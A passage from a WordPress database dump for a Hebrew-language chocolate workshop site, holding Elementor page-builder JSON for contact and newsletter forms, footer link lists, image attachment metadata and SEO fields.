successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1603,329,'_elementor_version','0.4'),(1604,329,'_elementor_template_type','post'),(1607,330,'_wp_page_template','elementor_header_footer'),(1608,330,'_elementor_edit_mode','builder'),(1609,330,'_elementor_data','[{\"id\":\"e6a36e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"56533f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b6e992\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4 \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3U4\",\"header_size\":\"h1\",\"align\":\"right\",\"title_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41a38a9\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_size\":\"md\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e6\\u05d5\\u05e8 \\u05e7\\u05e9\\u05e8 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"button_background_color\":\"#692910\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34828&lm_key=3fd3e41540f344c6af1c5864dadedc98\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a330bc8\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5b761419\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3e0c5e0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1c71ccd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"786d6b73\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5b8f8c19\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"388c6046\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"6bd4621c\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6c50c739\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"129cbc32\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"75b11280\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f0bfe06\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5dfe763\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1610,330,'_elementor_version','0.4'),(1611,330,'_elementor_template_type','post'),(1614,331,'_wp_page_template','elementor_header_footer'),(1615,331,'_elementor_edit_mode','builder'),(1616,331,'_elementor_data','[{\"id\":\"e6a36e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"56533f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b6e992\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4 \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3U4\",\"header_size\":\"h1\",\"align\":\"right\",\"title_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41a38a9\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_size\":\"md\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e6\\u05d5\\u05e8 \\u05e7\\u05e9\\u05e8 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"button_background_color\":\"#692910\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34828&lm_key=3fd3e41540f344c6af1c5864dadedc98\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false}]'),(1617,331,'_elementor_version','0.4'),(1618,331,'_elementor_template_type','post'),(1624,333,'_edit_last','1'),(1625,333,'_edit_lock','1553425083:1'),(1628,335,'_wp_attached_file','2019/03/chocolate-170446_640.jpg'),(1629,335,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:426;s:4:\"file\";s:32:\"2019/03/chocolate-170446_640.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"chocolate-170446_640-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"chocolate-170446_640-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:32:\"chocolate-170446_640-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1630,333,'_thumbnail_id','335'),(1631,333,'_wp_page_template','default'),(1634,333,'_yoast_wpseo_title','עובדים עם שוקולד? כך תשמרו על הסדר - שוקולד4U'),(1635,333,'_yoast_wpseo_metadesc','בזמן שאתם עובדים עם שוקולד וחשוב לכם לשמור על הסדר, אספנו עבורכם מספר גאדג\'טים מגניבים למטבח, שיעזרו לכם לשמור על הסדר טוב טוב. היכנסו לכתבה המלאה'),(1636,333,'_yoast_wpseo_primary_category','7'),(1637,338,'_edit_last','1'),(1638,338,'_edit_lock','1554891690:1'),(1639,339,'_wp_attached_file','2019/04/88.jpeg'),(1640,339,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:900;s:4:\"file\";s:15:\"2019/04/88.jpeg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"88-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"88-300x169.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"88-768x432.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"88-1024x576.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:15:\"88-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1641,339,'_wp_attachment_image_alt','פלטת 